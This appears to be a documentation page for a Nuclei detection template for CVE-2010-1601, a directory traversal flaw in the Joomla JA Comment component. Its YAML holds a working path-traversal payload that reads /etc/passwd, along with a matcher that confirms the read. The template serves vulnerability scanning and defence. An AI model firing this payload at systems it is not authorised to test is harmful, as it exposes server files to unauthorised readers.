Joomla! Component JA Comment - Local File Inclusion
ID: CVE-2010-1601
Severity: medium
Author: daffainfo
Tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamart
Description
Section titled “Description”A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-1601
info: name: Joomla! Component JA Comment - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. impact: | Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest security patches or upgrade to a patched version of Joomla! Component JA Comment to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12236 - https://nvd.nist.gov/vuln/detail/CVE-2010-1601 - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/57848 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.01299 epss-percentile: 0.85844 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlamart product: com_jacomment tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamart
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a004630440220592c87bfb789de90b720ea032d4ba3d5f97b5122db57b3238968fa45aadb878e02202fdbe39f493a0cdf83b7baa1f4bc732117c5a09748c60ce7ac948468875bc2e7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-1601.yaml"